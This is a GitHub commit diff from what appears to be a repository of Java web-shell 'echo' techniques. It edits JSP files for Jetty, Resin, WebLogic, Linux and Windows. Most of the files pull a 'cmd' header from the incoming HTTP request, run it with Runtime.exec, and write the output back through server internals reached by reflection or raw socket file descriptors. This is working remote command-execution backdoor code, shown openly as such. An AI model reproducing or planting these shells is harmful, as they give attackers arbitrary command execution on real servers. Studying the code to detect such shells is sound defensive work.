Skip to content

Commit e5ea486

Browse files
author
feihong
committed
update
1 parent e70859f commit e5ea486

File tree

9 files changed

+705
-55
lines changed

9 files changed

+705
-55
lines changed

Jetty/code/jetty789Echo.jsp

Lines changed: 18 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,8 @@
1010
obj = field.get(obj);
1111
1212
Object[] obj_arr = (Object[]) obj;
13-
for(Object o : obj_arr){
13+
for(int i = 0; i < obj_arr.length; i++){
14+
Object o = obj_arr[i];
1415
if(o == null) continue;
1516
1617
field = o.getClass().getDeclaredField("value");
@@ -19,35 +20,35 @@
1920
2021
if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
2122
Object connection = obj;
22-
java.lang.reflect.Method method = connection.getClass().getMethod("getRequest");
23-
obj = method.invoke(connection);
23+
java.lang.reflect.Method method = connection.getClass().getMethod("getRequest", null);
24+
obj = method.invoke(connection, null);
2425
25-
method = obj.getClass().getMethod("getHeader", String.class);
26-
obj = method.invoke(obj, "cmd");
26+
method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
27+
obj = method.invoke(obj, new Object[]{"cmd"});
2728
2829
String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
2930
30-
method = connection.getClass().getMethod("getPrintWriter", String.class);
31-
java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
31+
method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
32+
java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
3233
printWriter.println(res);
3334
3435
}else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
35-
java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel");
36-
Object httpChannel = method.invoke(obj);
36+
java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
37+
Object httpChannel = method.invoke(obj, null);
3738
38-
method = httpChannel.getClass().getMethod("getRequest");
39-
obj = method.invoke(httpChannel);
39+
method = httpChannel.getClass().getMethod("getRequest", null);
40+
obj = method.invoke(httpChannel, null);
4041
41-
method = obj.getClass().getMethod("getHeader", String.class);
42-
obj = method.invoke(obj, "cmd");
42+
method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
43+
obj = method.invoke(obj, new Object[]{"cmd"});
4344
4445
String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
4546
46-
method = httpChannel.getClass().getMethod("getResponse");
47-
obj = method.invoke(httpChannel);
47+
method = httpChannel.getClass().getMethod("getResponse", null);
48+
obj = method.invoke(httpChannel, null);
4849
49-
method = obj.getClass().getMethod("getWriter");
50-
java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
50+
method = obj.getClass().getMethod("getWriter", null);
51+
java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
5152
printWriter.println(res);
5253
}
5354
}

Linux/code/case2.jsp

Lines changed: 12 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -3,34 +3,31 @@
33
String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
44
String[] cmd = new String[]{"/bin/sh", "-c", command };
55
java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
6-
7-
java.util.List<String> res1 = new java.util.ArrayList<>();
6+
java.util.List res1 = new java.util.ArrayList();
87
String line = "";
98
while ((line = br.readLine()) != null){
109
res1.add(line);
1110
}
1211
br.close();
1312
14-
Thread.sleep(2000);
13+
Thread.sleep((long)2000);
1514
1615
command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
1716
cmd = new String[]{"/bin/sh", "-c", command };
1817
br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
19-
20-
java.util.List<String> res2 = new java.util.ArrayList<>();
18+
java.util.List res2 = new java.util.ArrayList();
2119
while ((line = br.readLine()) != null){
2220
res2.add(line);
2321
}
24-
br.close();
22+
br.close();
2523
2624
int index = 0;
2725
int max = 0;
2826
for(int i = 0; i < res1.size(); i++){
2927
for(int j = 0; j < res2.size(); j++){
30-
if(res2.get(j).contains(res1.get(i))){
31-
String socketNo = res2.get(j).split("\\s+")[1].substring(8);
28+
if(((String)res2.get(j)).contains((String)res1.get(i))){
29+
String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
3230
socketNo = socketNo.substring(0, socketNo.length() - 1);
33-
3431
if(Integer.parseInt(socketNo) > max) {
3532
max = Integer.parseInt(socketNo);
3633
index = j;
@@ -39,14 +36,12 @@
3936
}
4037
}
4138
42-
int fd = Integer.parseInt(res2.get(index).split("\\s")[0]);
43-
44-
java.lang.reflect.Constructor<java.io.FileDescriptor> c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
39+
int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
40+
java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
4541
c.setAccessible(true);
46-
47-
cmd = new String[]{"/bin/sh", "-c", "ls -l" };
42+
cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
4843
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
49-
50-
java.io.FileOutputStream os = new java.io.FileOutputStream(c.newInstance(fd));
51-
os.write(res.getBytes());
44+
String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
45+
java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
46+
os.write(result.getBytes());
5247
%>

Resin/code/resinEcho.jsp

Lines changed: 7 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
22
<%
3-
Class clazz = Thread.currentThread().getClass();
3+
Class clazz = Thread.currentThread().getClass();
44
java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
55
field.setAccessible(true);
66
Object obj = field.get(Thread.currentThread());
@@ -10,22 +10,23 @@
1010
obj = field.get(obj);
1111
1212
Object[] obj_arr = (Object[]) obj;
13-
for(Object o : obj_arr) {
13+
for(int i = 0; i < obj_arr.length; i++) {
14+
Object o = obj_arr[i];
1415
if (o == null) continue;
1516
1617
field = o.getClass().getDeclaredField("value");
1718
field.setAccessible(true);
1819
obj = field.get(o);
1920
20-
if(obj instanceof com.caucho.server.http.HttpRequest){
21+
if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
2122
com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
2223
String cmd = httpRequest.getHeader("cmd");
2324
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
24-
2525
com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
26-
java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream");
26+
httpResponse.setHeader("Content-Length", res.length() + "");
27+
java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
2728
method.setAccessible(true);
28-
com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse);
29+
com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
2930
httpResponseStream.write(res.getBytes(), 0, res.length());
3031
httpResponseStream.close();
3132
}

Windows/code/WindowsEcho.jsp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -62,7 +62,7 @@
6262
Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
6363
6464
String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
65-
String result = "HTTP/1.1 200 OK\nConnection: close\n\n" + res + "\n";
65+
String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
6666
write.invoke(socketOutputStream, new Object[]{result.getBytes()});
6767
}catch (Exception e){
6868
//pass

weblogic/code/weblogic-10.0.3.jsp

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,10 @@
11
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
22
<%
33
String cmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("cmd");
4-
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
5-
weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
6-
weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
7-
outputStream.writeStream(new weblogic.xml.util.StringInputStream(res));
8-
outputStream.flush();
9-
response.getWriter().write("");
4+
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
5+
weblogic.servlet.internal.ServletResponseImpl r = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
6+
weblogic.servlet.internal.ServletOutputStreamImpl outputStream = r.getServletOutputStream();
7+
outputStream.writeStream(new weblogic.xml.util.StringInputStream(res));
8+
outputStream.flush();
9+
response.getWriter().write("");
1010
%>

weblogic/code/weblogic-12.1.3.jsp

Lines changed: 9 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,12 @@
11
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
22
<%
3-
java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
4-
field.setAccessible(true);
5-
HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
6-
String cmd = "echo \"It works!\"";
7-
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
8-
httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
9-
httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
10-
httpConn.getServletRequest().getResponse().getWriter().write("");
3+
weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread)Thread.currentThread();
4+
java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)executeThread.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
5+
field.setAccessible(true);
6+
weblogic.servlet.internal.HttpConnectionHandler httpConn = (weblogic.servlet.internal.HttpConnectionHandler) field.get(executeThread.getCurrentWork());
7+
String cmd = "echo \"It works!\"";
8+
String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
9+
httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
10+
httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
11+
httpConn.getServletRequest().getResponse().getWriter().write("");
1112
%>

weblogic/img/x001.png

67 KB
Loading

weblogic/img/x002.png

59.5 KB
Loading

0 commit comments

Comments
 (0)